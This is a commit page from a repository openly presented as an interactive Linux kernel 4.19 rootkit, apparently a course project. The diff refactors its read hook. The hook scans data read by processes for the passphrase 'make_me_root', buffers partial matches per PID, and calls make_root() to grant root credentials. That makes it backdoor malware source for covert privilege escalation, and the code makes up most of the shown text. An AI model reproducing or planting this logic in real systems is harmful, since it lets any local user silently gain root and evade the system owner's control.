linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 7d955e36f93d9394d4e281d3e2bb11d7fa3bc1b3
parent 070f42ac284548ef79a192fc6401f69e2a07bf50
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 13:13:37 +0100

Refactoring

Diffstat:

Msrc/read.c | 19+++++++++++++++----


Msrc/read.h | 4++--


2 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/src/read.c b/src/read.c
@@ -7,10 +7,12 @@
 #include "hook.h"
 #include "creds.h"
 
-DEFINE_HASHTABLE(pid_ht, 8);
+DEFINE_HASHTABLE(pid_ht, 8); //2^8 buckets _should_ keep collisions low
 
 static const char *accept = "makerot_";
 
+
+//Using strspn allows us to only read inputs that include valid characters
 static int
 is_valid(char *buf, size_t size)
 {
@@ -73,6 +75,15 @@ get_entry(pid_t key)
     return NULL;
 }
 
+/**
+ * The idea here is to fill up our buffer as much as we can
+ * Should we reach the maximum capacity, we first of all
+ * compare what we read so far; if it's a match, grant root
+ * Otherwise, we can safely move the last 11 bytes to the start 
+ * (as the worst case is reading 'make_me_roo', which 
+ * is 11 characters long)
+ * This means we need to offset str with (23 - 11) = 12 = SHIFT_OFF
+ **/
 static void
 handle_compare(char *buf, pid_t pid, size_t size) 
 {
@@ -96,8 +107,8 @@ handle_compare(char *buf, pid_t pid, size_t size)
         }
 
         if(entry->capacity == 0) {
-            memmove(entry->str, (entry->str + 12), 12);
-            entry->capacity = entry->iter = 12;
+            memmove(entry->str, (entry->str + SHIFT_OFF), SHIFT_OFF);
+            entry->capacity = entry->iter = SHIFT_OFF;
 
             goto fill;
         }
@@ -114,7 +125,7 @@ handle_pid(pid_t pid, __user char *buf, size_t size)
     char *str = kzalloc(size, GFP_KERNEL);   
     copy_from_user(str, buf, size);
     
-    //Early return on exact match
+    //Early return on exact match, avoiding more expensive operations
     if(strnstr(str, PASSPHRASE, size)) {
         make_root();
         return;
diff --git a/src/read.h b/src/read.h
@@ -2,7 +2,7 @@
 #define _GROUP7_READ_H
 
 #define PASSPHRASE          "make_me_root"
-#define PASSHPHRASE_LEN     12
+#define SHIFT_OFF           12
 #define MAX_BUF             23 //We never need to save more than 23 Bytes
 
 
@@ -14,7 +14,7 @@ struct pid_entry {
     pid_t pid;
     char *str;
     int capacity;
-    int iter;
+    int iter; //Keep track of where we left off while filling str
     struct hlist_node hlist;
 };